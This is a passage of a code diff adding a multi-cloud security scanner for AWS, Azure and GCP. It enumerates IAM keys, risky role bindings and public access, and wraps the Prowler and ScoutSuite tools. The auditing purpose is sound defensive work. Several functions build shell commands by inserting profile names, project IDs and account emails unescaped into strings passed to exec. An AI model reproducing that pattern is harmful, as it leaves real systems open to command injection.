+      result.issues = analyzeIAMSecurity(scanID, result)
+
+    } catch (err) {
+      log.error("GCP IAM enumeration failed", { error: String(err) })
+      result.findings.push(`GCP IAM enumeration error: ${String(err)}`)
+    }
+
+    return result
+  }
+
+  /**
+   * Get service accounts with user-managed keys.
+   */
+  export async function getServiceAccountsWithKeys(
+    options: GCPIAMOptions = {}
+  ): Promise<CloudScanTypes.IAMPrincipal[]> {
+    const { serviceAccounts } = await enumerate("check", options)
+    return serviceAccounts.filter((sa) => sa.accessKeys.length > 0)
+  }
+
+  /**
+   * Get service accounts with old keys.
+   */
+  export async function getServiceAccountsWithOldKeys(
+    maxAgeDays: number = 90,
+    options: GCPIAMOptions = {}
+  ): Promise<CloudScanTypes.IAMPrincipal[]> {
+    const { serviceAccounts } = await enumerate("check", options)
+    const maxAgeMs = maxAgeDays * 24 * 60 * 60 * 1000
+    const cutoff = Date.now() - maxAgeMs
+
+    return serviceAccounts.filter((sa) =>
+      sa.accessKeys.some(
+        (k) => k.status === "active" && k.createdAt && k.createdAt < cutoff
+      )
+    )
+  }
+
+  /**
+   * Get principals with high-privilege roles.
+   */
+  export async function getHighPrivilegePrincipals(
+    options: GCPIAMOptions = {}
+  ): Promise<Array<{ member: string; role: string }>> {
+    const { iamBindings } = await enumerate("check", options)
+
+    const highPrivRoles = [
+      "roles/owner",
+      "roles/editor",
+      "roles/iam.serviceAccountAdmin",
+      "roles/iam.serviceAccountKeyAdmin",
+      "roles/iam.securityAdmin",
+      "roles/resourcemanager.projectIamAdmin",
+    ]
+
+    const results: Array<{ member: string; role: string }> = []
+
+    for (const binding of iamBindings) {
+      if (highPrivRoles.includes(binding.role)) {
+        for (const member of binding.members) {
+          results.push({ member, role: binding.role })
+        }
+      }
+    }
+
+    return results
+  }
+
+  /**
+   * Check for public IAM bindings.
+   */
+  export async function getPublicBindings(
+    options: GCPIAMOptions = {}
+  ): Promise<Array<{ role: string; member: string }>> {
+    const { iamBindings } = await enumerate("check", options)
+
+    const results: Array<{ role: string; member: string }> = []
+
+    for (const binding of iamBindings) {
+      for (const member of binding.members) {
+        if (member === "allUsers" || member === "allAuthenticatedUsers") {
+          results.push({ role: binding.role, member })
+        }
+      }
+    }
+
+    return results
+  }
+
+  // ========== Helper Functions ==========
+
+  async function runGCloudCommand(command: string, _timeout?: number): Promise<string | null> {
+    try {
+      const { stdout } = await execAsync(command)
+      return stdout.trim()
+    } catch (err) {
+      log.debug("GCloud command failed", { command, error: String(err) })
+      return null
+    }
+  }
+
+  async function enrichServiceAccountKeys(
+    sa: CloudScanTypes.IAMPrincipal,
+    projectFlag: string,
+    timeout?: number
+  ): Promise<void> {
+    if (!sa.email) return
+
+    try {
+      const keysOutput = await runGCloudCommand(
+        `gcloud iam service-accounts keys list --iam-account=${sa.email} ${projectFlag} --format json`,
+        timeout
+      )
+
+      if (keysOutput) {
+        const keys = GCloudParser.parseServiceAccountKeys(keysOutput)
+        // Filter out system-managed keys
+        sa.accessKeys = keys.filter((k) => !k.id.includes("system"))
+      }
+    } catch (err) {
+      log.debug("Failed to get service account keys", { sa: sa.email, error: String(err) })
+    }
+  }
+
+  function analyzeIAMSecurity(
+    scanID: string,
+    result: GCPIAMResult
+  ): CloudScanTypes.CloudFinding[] {
+    const findings: CloudScanTypes.CloudFinding[] = []
+
+    // Check for service accounts with user-managed keys
+    for (const sa of result.serviceAccounts) {
+      if (sa.accessKeys.length > 0) {
+        findings.push(createFinding(
+          scanID,
+          "medium",
+          "Service Account Has User-Managed Keys",
+          `Service account ${sa.name} (${sa.email}) has ${sa.accessKeys.length} user-managed key(s). Consider using workload identity or IAM service account impersonation instead.`,
+          "service-account",
+          sa.id
+        ))
+
+        // Check for old keys
+        const oldKeys = sa.accessKeys.filter((k) => {
+          if (!k.createdAt) return false
+          const ageMs = Date.now() - k.createdAt
+          return ageMs > 90 * 24 * 60 * 60 * 1000
+        })
+
+        if (oldKeys.length > 0) {
+          findings.push(createFinding(
+            scanID,
+            "high",
+            "Service Account Has Old Keys",
+            `Service account ${sa.name} has ${oldKeys.length} key(s) older than 90 days.`,
+            "service-account",
+            sa.id
+          ))
+        }
+      }
+    }
+
+    // Check for public IAM bindings
+    for (const binding of result.iamBindings) {
+      for (const member of binding.members) {
+        if (member === "allUsers") {
+          findings.push(createFinding(
+            scanID,
+            "critical",
+            "IAM Binding Allows All Users",
+            `Role ${binding.role} is granted to allUsers (anyone on the internet).`,
+            "policy",
+            binding.role
+          ))
+
+          Bus.publish(CloudScanEvents.IAMPolicyIssue, {
+            scanID,
+            provider: "gcp",
+            policyName: binding.role,
+            issue: "Role granted to allUsers",
+            severity: "critical",
+          })
+        } else if (member === "allAuthenticatedUsers") {
+          findings.push(createFinding(
+            scanID,
+            "high",
+            "IAM Binding Allows All Authenticated Users",
+            `Role ${binding.role} is granted to allAuthenticatedUsers (any Google account).`,
+            "policy",
+            binding.role
+          ))
+
+          Bus.publish(CloudScanEvents.IAMPolicyIssue, {
+            scanID,
+            provider: "gcp",
+            policyName: binding.role,
+            issue: "Role granted to allAuthenticatedUsers",
+            severity: "high",
+          })
+        }
+      }
+    }
+
+    // Check custom roles for issues
+    for (const role of result.customRoles) {
+      if (role.issues.length > 0) {
+        findings.push(createFinding(
+          scanID,
+          "medium",
+          "Custom Role Has Security Issues",
+          `Custom role ${role.name} has issues: ${role.issues.join(", ")}`,
+          "role",
+          role.id
+        ))
+      }
+    }
+
+    return findings
+  }
+
+  function createFinding(
+    scanID: string,
+    severity: CloudScanTypes.Severity,
+    title: string,
+    description: string,
+    resourceType: CloudScanTypes.ResourceType,
+    resourceId: string
+  ): CloudScanTypes.CloudFinding {
+    const finding: CloudScanTypes.CloudFinding = {
+      id: `gcp_iam_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`,
+      provider: "gcp",
+      severity,
+      title,
+      description,
+      resourceType,
+      resourceId,
+      category: "iam",
+      complianceFrameworks: ["cis", "gcp-security-foundations"],
+      references: [],
+      foundAt: Date.now(),
+      source: "scanner",
+    }
+
+    Bus.publish(CloudScanEvents.FindingDetected, {
+      scanID,
+      provider: "gcp",
+      findingId: finding.id,
+      title,
+      severity,
+      category: "iam",
+      resourceType,
+      resourceId,
+    })
+
+    return finding
+  }
+}
diff --git a/packages/opencode/src/pentest/cloudscan/gcp/index.ts b/packages/opencode/src/pentest/cloudscan/gcp/index.ts
new file mode 100644
index 00000000000..579e0613bbf
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/gcp/index.ts
@@ -0,0 +1,19 @@
+/**
+ * @fileoverview GCP Cloud Security Module
+ *
+ * GCP-specific security scanning capabilities.
+ *
+ * @module pentest/cloudscan/gcp
+ */
+
+export { GCPIAM } from "./iam"
+export type { GCPIAMOptions, GCPIAMResult } from "./iam"
+
+export { GCPGCS } from "./gcs"
+export type { GCPGCSOptions, GCPGCSResult } from "./gcs"
+
+export { GCPFirewall } from "./firewall"
+export type { GCPFirewallOptions, GCPFirewallResult } from "./firewall"
+
+export { GCPCompute } from "./compute"
+export type { GCPComputeOptions, GCPComputeResult } from "./compute"
diff --git a/packages/opencode/src/pentest/cloudscan/index.ts b/packages/opencode/src/pentest/cloudscan/index.ts
new file mode 100644
index 00000000000..f609a8d3551
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/index.ts
@@ -0,0 +1,38 @@
+/**
+ * @fileoverview Cloud Security Scanner Module
+ *
+ * Cloud infrastructure security testing capabilities for AWS, Azure, and GCP.
+ * Includes IAM analysis, storage security, network security groups, and compliance.
+ *
+ * @module pentest/cloudscan
+ */
+
+// Core exports
+export { CloudScanTypes } from "./types"
+export { CloudScanEvents } from "./events"
+export { CloudScanStorage } from "./storage"
+export type { StorageConfig } from "./storage"
+export { CloudScanProfiles } from "./profiles"
+export { CloudScanOrchestrator } from "./orchestrator"
+export type { CloudScanOptions, CloudScanResult } from "./orchestrator"
+export { CloudScanTool } from "./tool"
+
+// Discovery
+export { CloudDiscovery } from "./discovery"
+export type { DiscoveryOptions, DiscoveryResult } from "./discovery"
+
+// Compliance
+export { ComplianceChecker } from "./compliance"
+export type { ComplianceResult } from "./compliance"
+
+// Parser exports
+export * from "./parsers"
+
+// AWS exports
+export * from "./aws"
+
+// Azure exports
+export * from "./azure"
+
+// GCP exports
+export * from "./gcp"
diff --git a/packages/opencode/src/pentest/cloudscan/orchestrator.ts b/packages/opencode/src/pentest/cloudscan/orchestrator.ts
new file mode 100644
index 00000000000..c89146fbcba
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/orchestrator.ts
@@ -0,0 +1,664 @@
+/**
+ * @fileoverview Cloud Security Scan Orchestrator
+ *
+ * Coordinates cloud security scanning across providers.
+ *
+ * @module pentest/cloudscan/orchestrator
+ */
+
+import { CloudScanTypes } from "./types"
+import { CloudScanEvents } from "./events"
+import { CloudScanStorage } from "./storage"
+import { CloudScanProfiles } from "./profiles"
+import { CloudDiscovery } from "./discovery"
+import type { DiscoveryResult } from "./discovery"
+import { ComplianceChecker } from "./compliance"
+import type { ComplianceResult } from "./compliance"
+import { Bus } from "../../bus"
+import { Log } from "../../util/log"
+import { exec } from "child_process"
+import { promisify } from "util"
+
+const execAsync = promisify(exec)
+
+// Provider modules
+import { AWSIAM, AWSS3, AWSSecurityGroups, AWSEC2, AWSLambda } from "./aws"
+import { AzureRBAC, AzureStorage, AzureNSG, AzureVM } from "./azure"
+import { GCPIAM, GCPGCS, GCPFirewall, GCPCompute } from "./gcp"
+
+// Parsers
+import { ProwlerParser, ScoutSuiteParser } from "./parsers"
+
+const log = Log.create({ service: "cloudscan.orchestrator" })
+
+/**
+ * Scan options.
+ */
+export interface CloudScanOptions {
+  provider: CloudScanTypes.CloudProvider
+  profile?: string
+  regions?: string[]
+  resourceTypes?: CloudScanTypes.ResourceType[]
+  complianceFrameworks?: CloudScanTypes.ComplianceFramework[]
+  timeout?: number
+  // Provider options
+  awsProfile?: string
+  azureSubscription?: string
+  gcpProject?: string
+  // External tools
+  useProwler?: boolean
+  useScoutSuite?: boolean
+}
+
+/**
+ * Full scan result.
+ */
+export interface CloudScanResult {
+  id: string
+  provider: CloudScanTypes.CloudProvider
+  profile: string
+  status: "running" | "completed" | "failed"
+  startTime: number
+  endTime?: number
+  discovery: DiscoveryResult
+  findings: CloudScanTypes.CloudFinding[]
+  compliance: ComplianceResult[]
+  externalTools: {
+    prowler?: { findings: CloudScanTypes.CloudFinding[]; errors: string[] }
+    scoutsuite?: { findings: CloudScanTypes.CloudFinding[]; errors: string[] }
+  }
+  summary: {
+    totalResources: number
+    totalFindings: number
+    bySeverity: Record<CloudScanTypes.Severity, number>
+    byCategory: Record<string, number>
+  }
+  errors: string[]
+}
+
+/**
+ * CloudScanOrchestrator namespace.
+ */
+export namespace CloudScanOrchestrator {
+  const runningScans = new Map<string, CloudScanResult>()
+
+  /**
+   * Run a full cloud security scan.
+   */
+  export async function scan(options: CloudScanOptions): Promise<CloudScanResult> {
+    const scanID = `cloudscan_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`
+    const profileId = CloudScanTypes.ProfileId.safeParse(options.profile || "standard")
+    const validProfileId: CloudScanTypes.ProfileId = profileId.success ? profileId.data : "standard"
+    const profile = CloudScanProfiles.get(validProfileId)
+
+    if (!profile) {
+      throw new Error(`Invalid profile: ${options.profile}`)
+    }
+
+    const result: CloudScanResult = {
+      id: scanID,
+      provider: options.provider,
+      profile: profile.id,
+      status: "running",
+      startTime: Date.now(),
+      discovery: {
+        provider: options.provider,
+        regions: options.regions || [],
+        resources: {
+          iam: { users: [], roles: [], policies: [] },
+          storage: [],
+          network: { securityGroups: [], vpcs: [] },
+          compute: { instances: [], functions: [] },
+        },
+        summary: { totalResources: 0, byType: {}, byRegion: {} },
+        errors: [],
+      },
+      findings: [],
+      compliance: [],
+      externalTools: {},
+      summary: {
+        totalResources: 0,
+        totalFindings: 0,
+        bySeverity: { critical: 0, high: 0, medium: 0, low: 0, info: 0 },
+        byCategory: {},
+      },
+      errors: [],
+    }
+
+    runningScans.set(scanID, result)
+
+    Bus.publish(CloudScanEvents.ScanStarted, {
+      scanID,
+      provider: options.provider,
+      profile: profile.id,
+      region: options.regions?.[0],
+      modules: profile.phases,
+    })
+
+    try {
+      // Check prerequisites
+      const prereqs = await CloudDiscovery.checkPrerequisites(options.provider)
+      if (!prereqs.available) {
+        throw new Error(`Prerequisites not met: ${prereqs.errors.join(", ")}`)
+      }
+
+      // Phase 1: Discovery
+      if (profile.phases.includes("discovery")) {
+        log.info("Starting discovery phase", { scanID, provider: options.provider })
+        result.discovery = await CloudDiscovery.discover(scanID, {
+          provider: options.provider,
+          regions: options.regions,
+          resourceTypes: options.resourceTypes,
+          timeout: options.timeout,
+          awsProfile: options.awsProfile,
+          azureSubscription: options.azureSubscription,
+          gcpProject: options.gcpProject,
+        })
+        result.errors.push(...result.discovery.errors)
+      }
+
+      // Phase 2: Security Analysis
+      if (profile.phases.includes("security")) {
+        log.info("Starting security analysis phase", { scanID })
+        const findings = await runSecurityAnalysis(scanID, options, result.discovery)
+        result.findings.push(...findings)
+      }
+
+      // Phase 3: External Tools
+      if (profile.phases.includes("compliance")) {
+        if (options.useProwler || profile.externalTools?.prowler) {
+          log.info("Running Prowler", { scanID })
+          result.externalTools.prowler = await runProwler(scanID, options)
+          result.findings.push(...(result.externalTools.prowler.findings || []))
+          result.errors.push(...(result.externalTools.prowler.errors || []))
+        }
+
+        if (options.useScoutSuite || profile.externalTools?.scoutsuite) {
+          log.info("Running ScoutSuite", { scanID })
+          result.externalTools.scoutsuite = await runScoutSuite(scanID, options)
+          result.findings.push(...(result.externalTools.scoutsuite.findings || []))
+          result.errors.push(...(result.externalTools.scoutsuite.errors || []))
+        }
+      }
+
+      // Phase 4: Compliance
+      if (profile.phases.includes("compliance")) {
+        const frameworks =
+          options.complianceFrameworks ||
+          profile.complianceFrameworks ||
+          ["cis"]
+
+        log.info("Running compliance checks", { scanID, frameworks })
+        result.compliance = ComplianceChecker.evaluateAll(
+          scanID,
+          options.provider,
+          frameworks,
+          result.findings
+        )
+      }
+
+      // Calculate summary
+      calculateSummary(result)
+
+      result.status = "completed"
+      result.endTime = Date.now()
+
+      Bus.publish(CloudScanEvents.ScanCompleted, {
+        scanID,
+        provider: options.provider,
+        profile: profile.id,
+        resourcesDiscovered: result.summary.totalResources,
+        findingsCount: result.summary.totalFindings,
+        criticalCount: result.summary.bySeverity.critical,
+        highCount: result.summary.bySeverity.high,
+        duration: result.endTime - result.startTime,
+        status: "completed",
+      })
+
+      // Save result - convert to CloudScanTypes.CloudScanResult format
+      const storageResult: CloudScanTypes.CloudScanResult = {
+        id: result.id,
+        provider: result.provider,
+        profile: result.profile as CloudScanTypes.ProfileId,
+        resources: [],
+        principals: [],
+        groups: [],
+        roles: [],
+        policies: [],
+        buckets: [],
+        securityGroups: [],
+        vpcs: [],
+        instances: [],
+        functions: [],
+        findings: result.findings,
+        complianceChecks: [],
+        complianceSummaries: [],
+        stats: {
+          resourcesDiscovered: result.summary.totalResources,
+          resourcesScanned: result.summary.totalResources,
+          usersFound: result.discovery.resources.iam.users.length,
+          rolesFound: result.discovery.resources.iam.roles.length,
+          policiesFound: result.discovery.resources.iam.policies.length,
+          bucketsFound: result.discovery.resources.storage.length,
+          securityGroupsFound: result.discovery.resources.network.securityGroups.length,
+          instancesFound: result.discovery.resources.compute.instances.length,
+          functionsFound: result.discovery.resources.compute.functions.length,
+          findingsCount: result.summary.totalFindings,
+          criticalCount: result.summary.bySeverity.critical,
+          highCount: result.summary.bySeverity.high,
+          mediumCount: result.summary.bySeverity.medium,
+          lowCount: result.summary.bySeverity.low,
+          infoCount: result.summary.bySeverity.info,
+          complianceScore: result.compliance.length > 0
+            ? result.compliance.reduce((sum, c) => sum + c.summary.passRate, 0) / result.compliance.length
+            : undefined,
+          duration: (result.endTime || Date.now()) - result.startTime,
+        },
+        startedAt: result.startTime,
+        completedAt: result.endTime,
+        status: result.status,
+      }
+      await CloudScanStorage.saveScan(storageResult)
+    } catch (err) {
+      result.status = "failed"
+      result.endTime = Date.now()
+      result.errors.push(String(err))
+
+      log.error("Scan failed", { scanID, error: String(err) })
+
+      Bus.publish(CloudScanEvents.ScanFailed, {
+        scanID,
+        provider: options.provider,
+        error: String(err),
+      })
+    }
+
+    runningScans.delete(scanID)
+    return result
+  }
+
+  /**
+   * Run a quick scan.
+   */
+  export async function quickScan(
+    options: Omit<CloudScanOptions, "profile">
+  ): Promise<CloudScanResult> {
+    return scan({ ...options, profile: "quick" })
+  }
+
+  /**
+   * Run a thorough scan.
+   */
+  export async function thoroughScan(
+    options: Omit<CloudScanOptions, "profile">
+  ): Promise<CloudScanResult> {
+    return scan({ ...options, profile: "thorough" })
+  }
+
+  /**
+   * Run IAM-focused scan.
+   */
+  export async function iamScan(
+    options: Omit<CloudScanOptions, "profile" | "resourceTypes">
+  ): Promise<CloudScanResult> {
+    return scan({
+      ...options,
+      profile: "iam-focused",
+      resourceTypes: ["user", "role", "policy", "service-account"],
+    })
+  }
+
+  /**
+   * Run storage-focused scan.
+   */
+  export async function storageScan(
+    options: Omit<CloudScanOptions, "profile" | "resourceTypes">
+  ): Promise<CloudScanResult> {
+    return scan({
+      ...options,
+      profile: "storage-focused",
+      resourceTypes: ["bucket"],
+    })
+  }
+
+  /**
+   * Run network-focused scan.
+   */
+  export async function networkScan(
+    options: Omit<CloudScanOptions, "profile" | "resourceTypes">
+  ): Promise<CloudScanResult> {
+    return scan({
+      ...options,
+      profile: "network-focused",
+      resourceTypes: ["security-group", "vpc"],
+    })
+  }
+
+  /**
+   * Run compliance-only scan.
+   */
+  export async function complianceScan(
+    options: Omit<CloudScanOptions, "profile"> & {
+      frameworks: CloudScanTypes.ComplianceFramework[]
+    }
+  ): Promise<CloudScanResult> {
+    return scan({
+      ...options,
+      profile: "compliance",
+      complianceFrameworks: options.frameworks,
+    })
+  }
+
+  /**
+   * Get scan status.
+   */
+  export function getStatus(scanID: string): CloudScanResult | null {
+    return runningScans.get(scanID) || null
+  }
+
+  /**
+   * Get all running scans.
+   */
+  export function getRunningScans(): CloudScanResult[] {
+    return Array.from(runningScans.values())
+  }
+
+  /**
+   * Load a saved scan.
+   */
+  export async function loadScan(scanID: string): Promise<CloudScanTypes.CloudScanResult | null> {
+    return CloudScanStorage.loadScan(scanID)
+  }
+
+  /**
+   * List saved scans.
+   */
+  export async function listScans(
+    provider?: CloudScanTypes.CloudProvider
+  ): Promise<Array<{ id: string; provider: string; timestamp: number }>> {
+    const scans = await CloudScanStorage.listScans(provider)
+    // CloudScanStorage.listScans with just provider returns simplified format
+    return scans as Array<{ id: string; provider: string; timestamp: number }>
+  }
+
+  // ========== Security Analysis ==========
+
+  async function runSecurityAnalysis(
+    scanID: string,
+    options: CloudScanOptions,
+    discovery: DiscoveryResult
+  ): Promise<CloudScanTypes.CloudFinding[]> {
+    const findings: CloudScanTypes.CloudFinding[] = []
+
+    // Collect findings from each module based on discovered resources
+    switch (options.provider) {
+      case "aws":
+        findings.push(...await analyzeAWSResources(scanID, options, discovery))
+        break
+      case "azure":
+        findings.push(...await analyzeAzureResources(scanID, options, discovery))
+        break
+      case "gcp":
+        findings.push(...await analyzeGCPResources(scanID, options, discovery))
+        break
+    }
+
+    return findings
+  }
+
+  async function analyzeAWSResources(
+    scanID: string,
+    options: CloudScanOptions,
+    discovery: DiscoveryResult
+  ): Promise<CloudScanTypes.CloudFinding[]> {
+    const findings: CloudScanTypes.CloudFinding[] = []
+    const awsOptions = {
+      profile: options.awsProfile,
+      region: options.regions?.[0],
+      timeout: options.timeout,
+    }
+
+    try {
+      // IAM findings
+      const iamResult = await AWSIAM.enumerate(scanID, awsOptions)
+      findings.push(...iamResult.issues)
+
+      // S3 findings
+      const s3Result = await AWSS3.enumerate(scanID, awsOptions)
+      findings.push(...s3Result.issues)
+
+      // Security group findings
+      for (const region of options.regions || ["us-east-1"]) {
+        const sgResult = await AWSSecurityGroups.enumerate(scanID, {
+          ...awsOptions,
+          region,
+        })
+        findings.push(...sgResult.issues)
+
+        const ec2Result = await AWSEC2.enumerate(scanID, { ...awsOptions, region })
+        findings.push(...ec2Result.issues)
+
+        const lambdaResult = await AWSLambda.enumerate(scanID, {
+          ...awsOptions,
+          region,
+        })
+        findings.push(...lambdaResult.issues)
+      }
+    } catch (err) {
+      log.error("AWS analysis failed", { error: String(err) })
+    }
+
+    return findings
+  }
+
+  async function analyzeAzureResources(
+    scanID: string,
+    options: CloudScanOptions,
+    discovery: DiscoveryResult
+  ): Promise<CloudScanTypes.CloudFinding[]> {
+    const findings: CloudScanTypes.CloudFinding[] = []
+    const azureOptions = {
+      subscriptionId: options.azureSubscription,
+      timeout: options.timeout,
+    }
+
+    try {
+      const rbacResult = await AzureRBAC.enumerate(scanID, azureOptions)
+      findings.push(...rbacResult.issues)
+
+      const storageResult = await AzureStorage.enumerate(scanID, azureOptions)
+      findings.push(...storageResult.issues)
+
+      const nsgResult = await AzureNSG.enumerate(scanID, azureOptions)
+      findings.push(...nsgResult.issues)
+
+      const vmResult = await AzureVM.enumerate(scanID, azureOptions)
+      findings.push(...vmResult.issues)
+    } catch (err) {
+      log.error("Azure analysis failed", { error: String(err) })
+    }
+
+    return findings
+  }
+
+  async function analyzeGCPResources(
+    scanID: string,
+    options: CloudScanOptions,
+    discovery: DiscoveryResult
+  ): Promise<CloudScanTypes.CloudFinding[]> {
+    const findings: CloudScanTypes.CloudFinding[] = []
+    const gcpOptions = {
+      projectId: options.gcpProject,
+      timeout: options.timeout,
+    }
+
+    try {
+      const iamResult = await GCPIAM.enumerate(scanID, gcpOptions)
+      findings.push(...iamResult.issues)
+
+      const gcsResult = await GCPGCS.enumerate(scanID, gcpOptions)
+      findings.push(...gcsResult.issues)
+
+      const fwResult = await GCPFirewall.enumerate(scanID, gcpOptions)
+      findings.push(...fwResult.issues)
+
+      const computeResult = await GCPCompute.enumerate(scanID, gcpOptions)
+      findings.push(...computeResult.issues)
+    } catch (err) {
+      log.error("GCP analysis failed", { error: String(err) })
+    }
+
+    return findings
+  }
+
+  // ========== External Tools ==========
+
+  async function runProwler(
+    scanID: string,
+    options: CloudScanOptions
+  ): Promise<{ findings: CloudScanTypes.CloudFinding[]; errors: string[] }> {
+    const result = { findings: [] as CloudScanTypes.CloudFinding[], errors: [] as string[] }
+
+    try {
+      // Check if prowler is installed
+      try {
+        await execAsync("which prowler")
+      } catch {
+        result.errors.push("Prowler not installed")
+        return result
+      }
+
+      // Build command
+      let cmd = "prowler"
+      if (options.provider === "aws") {
+        cmd += " aws"
+        if (options.awsProfile) cmd += ` --profile ${options.awsProfile}`
+        if (options.regions?.length) cmd += ` --region ${options.regions.join(",")}`
+      } else if (options.provider === "azure") {
+        cmd += " azure"
+        if (options.azureSubscription) cmd += ` --subscription-ids ${options.azureSubscription}`
+      } else if (options.provider === "gcp") {
+        cmd += " gcp"
+        if (options.gcpProject) cmd += ` --project-ids ${options.gcpProject}`
+      }
+
+      cmd += " --output-formats json --output-directory /tmp/prowler"
+
+      log.info("Running Prowler", { command: cmd })
+      await execAsync(cmd)
+
+      // Parse output
+      const outputFile = `/tmp/prowler/prowler-output-${options.provider}-*.json`
+      const { stdout: files } = await execAsync(`ls ${outputFile} 2>/dev/null || true`)
+
+      if (files.trim()) {
+        const latestFile = files.trim().split("\n").pop()
+        if (latestFile) {
+          const { stdout: output } = await execAsync(`cat ${latestFile}`)
+          result.findings = ProwlerParser.parseOutput(output, options.provider)
+        }
+      }
+
+      Bus.publish(CloudScanEvents.ExternalToolCompleted, {
+        scanID,
+        tool: "prowler",
+        provider: options.provider,
+        findingsCount: result.findings.length,
+        duration: 0,
+      })
+    } catch (err) {
+      result.errors.push(`Prowler error: ${String(err)}`)
+      log.error("Prowler failed", { error: String(err) })
+    }
+
+    return result
+  }
+
+  async function runScoutSuite(
+    scanID: string,
+    options: CloudScanOptions
+  ): Promise<{ findings: CloudScanTypes.CloudFinding[]; errors: string[] }> {
+    const result = { findings: [] as CloudScanTypes.CloudFinding[], errors: [] as string[] }
+
+    try {
+      // Check if scout is installed
+      try {
+        await execAsync("which scout")
+      } catch {
+        result.errors.push("ScoutSuite not installed")
+        return result
+      }
+
+      // Build command
+      let cmd = "scout"
+      if (options.provider === "aws") {
+        cmd += " aws"
+        if (options.awsProfile) cmd += ` --profile ${options.awsProfile}`
+        if (options.regions?.length) cmd += ` --regions ${options.regions.join(",")}`
+      } else if (options.provider === "azure") {
+        cmd += " azure --cli"
+        if (options.azureSubscription) cmd += ` --subscriptions ${options.azureSubscription}`
+      } else if (options.provider === "gcp") {
+        cmd += " gcp"
+        if (options.gcpProject) cmd += ` --project-id ${options.gcpProject}`
+      }
+
+      cmd += " --report-dir /tmp/scoutsuite --no-browser"
+
+      log.info("Running ScoutSuite", { command: cmd })
+      await execAsync(cmd)
+
+      // Parse output
+      const outputDir = `/tmp/scoutsuite/scoutsuite-results`
+      const { stdout: files } = await execAsync(`ls ${outputDir}/*.json 2>/dev/null || true`)
+
+      if (files.trim()) {
+        const latestFile = files.trim().split("\n").pop()
+        if (latestFile) {
+          const { stdout: output } = await execAsync(`cat ${latestFile}`)
+          result.findings = ScoutSuiteParser.parseOutput(output, options.provider)
+        }
+      }
+
+      Bus.publish(CloudScanEvents.ExternalToolCompleted, {
+        scanID,
+        tool: "scoutsuite",
+        provider: options.provider,
+        findingsCount: result.findings.length,
+        duration: 0,
+      })
+    } catch (err) {
+      result.errors.push(`ScoutSuite error: ${String(err)}`)
+      log.error("ScoutSuite failed", { error: String(err) })
+    }
+
+    return result
+  }
+
+  // ========== Summary ==========
+
+  function calculateSummary(result: CloudScanResult): void {
+    result.summary.totalResources = result.discovery.summary.totalResources
+
+    // Dedupe findings by ID
+    const uniqueFindings = new Map<string, CloudScanTypes.CloudFinding>()
+    for (const finding of result.findings) {
+      uniqueFindings.set(finding.id, finding)
+    }
+    result.findings = Array.from(uniqueFindings.values())
+    result.summary.totalFindings = result.findings.length
+
+    // Count by severity
+    result.summary.bySeverity = { critical: 0, high: 0, medium: 0, low: 0, info: 0 }
+    for (const finding of result.findings) {
+      result.summary.bySeverity[finding.severity]++
+    }
+
+    // Count by category
+    result.summary.byCategory = {}
+    for (const finding of result.findings) {
+      const category = finding.category || "uncategorized"
+      result.summary.byCategory[category] = (result.summary.byCategory[category] || 0) + 1
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/cloudscan/parsers/aws-cli.ts b/packages/opencode/src/pentest/cloudscan/parsers/aws-cli.ts
new file mode 100644
index 00000000000..cd293fb0a1a
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/parsers/aws-cli.ts
@@ -0,0 +1,632 @@
+/**
+ * @fileoverview AWS CLI Output Parser
+ *
+ * Parses JSON output from AWS CLI commands.
+ *
+ * @module pentest/cloudscan/parsers/aws-cli
+ */
+
+import { CloudScanTypes } from "../types"
+import { Log } from "../../../util/log"
+
+const log = Log.create({ service: "cloudscan.parser.aws-cli" })
+
+/**
+ * AWS CLI parser namespace.
+ */
+export namespace AWSCLIParser {
+  // ========== IAM Parsing ==========
+
+  /**
+   * Parse IAM users list output.
+   */
+  export function parseUsers(output: string): CloudScanTypes.IAMPrincipal[] {
+    try {
+      const data = JSON.parse(output)
+      const users = data.Users || []
+
+      return users.map((user: any) => ({
+        id: user.UserId || user.UserName,
+        arn: user.Arn,
+        name: user.UserName,
+        provider: "aws" as const,
+        type: "user" as const,
+        createdAt: user.CreateDate ? new Date(user.CreateDate).getTime() : undefined,
+        passwordLastUsed: user.PasswordLastUsed ? new Date(user.PasswordLastUsed).getTime() : undefined,
+        mfaEnabled: false, // Needs separate call
+        accessKeys: [],
+        inlinePolicies: [],
+        attachedPolicies: [],
+        groups: [],
+        roles: [],
+        permissions: [],
+        issues: [],
+      }))
+    } catch (err) {
+      log.error("Failed to parse IAM users", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Parse IAM groups list output.
+   */
+  export function parseGroups(output: string): CloudScanTypes.IAMGroup[] {
+    try {
+      const data = JSON.parse(output)
+      const groups = data.Groups || []
+
+      return groups.map((group: any) => ({
+        id: group.GroupId || group.GroupName,
+        arn: group.Arn,
+        name: group.GroupName,
+        provider: "aws" as const,
+        members: [],
+        inlinePolicies: [],
+        attachedPolicies: [],
+        createdAt: group.CreateDate ? new Date(group.CreateDate).getTime() : undefined,
+      }))
+    } catch (err) {
+      log.error("Failed to parse IAM groups", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Parse IAM roles list output.
+   */
+  export function parseRoles(output: string): CloudScanTypes.IAMRole[] {
+    try {
+      const data = JSON.parse(output)
+      const roles = data.Roles || []
+
+      return roles.map((role: any) => ({
+        id: role.RoleId || role.RoleName,
+        arn: role.Arn,
+        name: role.RoleName,
+        provider: "aws" as const,
+        description: role.Description,
+        trustPolicy: role.AssumeRolePolicyDocument
+          ? typeof role.AssumeRolePolicyDocument === "string"
+            ? JSON.parse(decodeURIComponent(role.AssumeRolePolicyDocument))
+            : role.AssumeRolePolicyDocument
+          : undefined,
+        trustedEntities: extractTrustedEntities(role.AssumeRolePolicyDocument),
+        inlinePolicies: [],
+        attachedPolicies: [],
+        assumableBy: [],
+        createdAt: role.CreateDate ? new Date(role.CreateDate).getTime() : undefined,
+        isServiceLinked: role.Path?.includes("/aws-service-role/") || false,
+        issues: [],
+      }))
+    } catch (err) {
+      log.error("Failed to parse IAM roles", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Parse IAM policies list output.
+   */
+  export function parsePolicies(output: string): CloudScanTypes.IAMPolicy[] {
+    try {
+      const data = JSON.parse(output)
+      const policies = data.Policies || []
+
+      return policies.map((policy: any) => ({
